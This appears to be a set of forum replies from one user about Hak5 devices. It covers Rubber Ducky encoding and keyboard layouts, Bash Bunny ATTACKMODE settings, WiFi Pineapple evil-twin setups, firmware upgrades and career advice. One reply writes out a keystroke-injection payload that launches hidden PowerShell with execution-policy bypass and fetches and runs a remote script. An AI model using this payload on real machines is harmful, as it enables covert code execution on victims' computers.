dark_pyrro

Same thing was asked on Discord, so I guess it's the same user

If the networks/ESSIDs that the target devices are looking for are open networks, then you can spoof the ESSID and hope they will connect. If the networks are protected then you need to know the secret and set up the evil twin using that information. https://docs.hak5.org/wifi-pineapple/ui-overview/pineap#impersonation

OK, I understand That, however, doesn't convert anything to DuckyScript as I see it. So my question remains; what tool are you using to encode the DuckyScript code to an inject.bin file that the Ducky can execute? That doesn't really answer my question about if the keyboard language used when encoding the DuckyScript payload is corresponding to the keyboard language used by the intended target. So, is the target Windows computer using a US keyboard layout? From what I can tell by looking at the output posted, it seems as if line feeds aren't handled correctly. That's why I'm asking about keyboard layouts. It doesn't really look like that might be the issue, but I have to ask to rule that out of it all. And my last question; are you using a true/original/official Hak5 USB Rubber Ducky (first generation) when doing all of this?

Just to be sure; as I see it, it's not the Ducky script that is encoded with base64, it's the PowerShell code/script. What are you using to encode the Ducky script itself into an inject.bin? Are you using a language when encoding that corresponds with the target keyboard language (if not US)? BTW, both your screenshot and the included base64 code is exposing a Discord webhook. If it's your webhook then that should perhaps be removed if you don't want to share it.

That sounds sus. Writing it that way is a sign of not in ownership (or allowed by the owner) of the networks being attacked. Keep it legal if discussed here.

I wouldn't worry that much about the specs with such requirements. Just install it and run it and you'll figure out when the hardware is the limiting factor. Using the RPi you mention will most likely be just fine to start with if just using a very few devices that isn't that active. The same thing goes with the scenario if scaling things up, just test with what hardware you have available. And, if planning for 20-30 devices, you need to step up from the free community version and buy the Professional version, and in that case you should have access to standard support (not just community support) and can most likely ask official support about any hardware setup suggestions depending on your use case scenario.

Are you running other modules in the Pineapple or is HTTPeek the only one? I have never had any issues using that module, although I haven't had any real reason to use it since it's quite (or, very) limited in its scope. When saying "interfaces", I assume that you refer to network interfaces, such as wlan0, wlan0-1, wlan1, wlan2, and so on?

Why do you need more definitive numbers? It's easier to provide some kind of opinion if you're more specific about your needs (version of C2 that you plan to use, how many devices are you going to attach to the C2 server, if it's any kind of exfiltration scenario; what amounts of data is going to be extracted from devices to the C2 server in a specific time unit, any specific hardware that you already have plans to run it on and if so what specs does that hardware feature, etc, etc).

I have to say... I almost never ever read books when it comes to cybersec. I have quite a few for sure, but I always revert to things online. It's the natural way to learn for me and has always been from the point in time when internet was a relevant source of information (in my case since the beginning of the 90's even though it was far from what it is today in terms of available information). One way to do it (at least the way I would do it) is to decide what area of knowledge you want to focus on and then start to study hard, either it'd be web, Windows environments, OT, or whatever. If you want to buy books, then go ahead. And/or use web resources such as articles, white papers, CTF oriented web sites, etc. Also, try not to focus that much on the hacking perspective at first. Try to be good at the tech that is used, then you'd be a much better pen tester (or whatever area you want to enter in the cybersec realm). If you know web, you will be a much better "red teamer". If you have Windows environments in mind as future targets in customer engagements, then become good at Windows (client/server), AD, networking, etc. etc. The most recent list of books focusing on "hacking" that I've seen is the one posted on YouTube by Bombal. I have no idea if it's good quality or not. https://www.youtube.com/watch?v=r0P5vLcXpjY

After doing a factory reset/firmware recovery (according to the procedure described in the documentation), download the latest upgrade file from the Hak5 downloads web site and verify its SHA256 checksum, then: scp the upgrade to your pineapples /tmp directory ssh into the pineapple and enter the /tmp directory (verifying the sha256sum locally on the Pineapple as well isn't a bad idea, just to be sure) Execute: splitweb /tmp/upgrade.bin (or whatever firmware filename that has been downloaded) Then run: sysupgrade -n /tmp/upgrade.bin You do the above at your own risk. I'd suggest submitting a support ticket if you want to get official assistance on what to do.

As I understand it, there are infrastructural changes being made to the platform facilitating the awards including a new voting mechanism. It will be announced when ready.

Read the documentation of the tools available and you will get an understanding of what's possible or not. Well, just configuring an "evil twin" to use the same ESSID won't make any target device auto-connect to your fake AP if you don't already know the passphrase for that network. Not sure what you mean here. In what way does the MAC address affect it all?

Some users got Squirrels that didn't have the correct firmware flashed from factory, but that was really early, even before it was officially released. Not at all sure if this is the case here, but I would suggest submitting a support ticket to get assistance.

Perhaps some of the official EU resellers will ship to that country. Not sure of what restrictions that might be in place between EU and Israel though. Email them and ask.

It doesn't really matter where you begin if you don't know what you want to focus on when it comes to cybersec. Just like in AiW; "If you don't know where you're going, any road will take you there." It's such a large area of expertise that you have to focus on certain areas, you will most likely not be able to cover all of it anyway. Also select topics to develop knowledge in from any tech environments that the potential customers and engagements are most likely to be using. I think that the very base of things is to be good at the tech itself (and the business supported by the tech used). If you don't know OS:es, scripting, programming, networking, AD, etc. etc. chances are that you won't be very good at doing cybersec related stuff. You have to understand all the "layers" to be successful. Don't start with the "hacking" perspective. Start with using computers and what surrounds them. That's what you need to learn to be good at cybersec things. Kali, BlackArch, or whatever doesn't really matter as I see it. Some things will be a bit easier for sure since tools are available/installed, but you could use almost any OS/distro and add what's needed at each given moment. I most often use Kali when I feel the need for it, but is it because it's the best distro...? I haven't evaluated that at all and I don't feel that there's any need for it. Just spin up anything and use it. Selecting a programming language to learn just to create tools isn't something that I think you should focus on at this stage. If you've reached the point when you are skilled at such a level that you are developing your own tools, you know by your own experience what to use and that situation is not what you are in right now. Leave that for the future (if you ever need to get there). You also have a dedicated thread that is pinned to the top of this section of the forums that deals with the subject

There's always the official documentation. I'd suggest reading all of it. https://docs.hak5.org/bash-bunny/

Something like this ATTACKMODE HID QUACK DELAY 3000 QUACK GUI r QUACK DELAY 500 QUACK STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr 'https://redacted.site/pl.ps1'; iex $pl QUACK ENTER Perhaps also wrap the powershell line in quote marks and escape the dollar char as well QUACK STRING "powershell -w h -NoP -NonI -ep Bypass \$pl = iwr 'https://redacted.site/pl.ps1'; iex \$pl"

Yes, you need to QUACK things. The author is a competent user, so I'm not sure why it has been forgotten. Perhaps too quickly "converting" it from the USB Rubber Ducky to the Bunny.

It seems as if the author of the payload has forgotten to add that for some reason. Not sure why. You need to tell the Bunny what mode it should "act in". If you don't tell it to act as a keyboard (HID), it won't type anything. So... add ATTACKMODE HID to the top of the payload file To my knowledge, it's only the 2nd gen Ducky that defaults to ATTACKMODE HID if nothing is specified. Never heard/seen that it's valid for the Bunny. However, I guess you will have a bit of a challenge to get that running anyway since Dropbox has changed the way shared storage links are working and I don't think this payload has been adjusted to that fact.

Where's the ATTACKMODE?

What payloads are you using in each switch position?

https://docs.hak5.org/bash-bunny/getting-started/considerations-for-mark-ii#storage

I can't answer to how quality checks are made in the factory before delivery. You have to ask Hak5 about that, but I'm pretty sure it's not a situation they want.

Is the "suddenly" moment linked to you starting to use a Micro SD card with the Bunny? Judging from the screenshots, it seems as if you have tried to "duplicate" the file system structure of the internal storage to the Micro SD card. That won't work though since you always have to execute payloads stored on the internal udisk, not from the Micro SD card. They will simply not run at all.

Even if 1.1.1 works fine, there's still a potentially faulty flash storage device, and you don't want that. Just because you're running 1.1.1 doesn't make it go away, it's still there. https://hak5.customerdesk.io/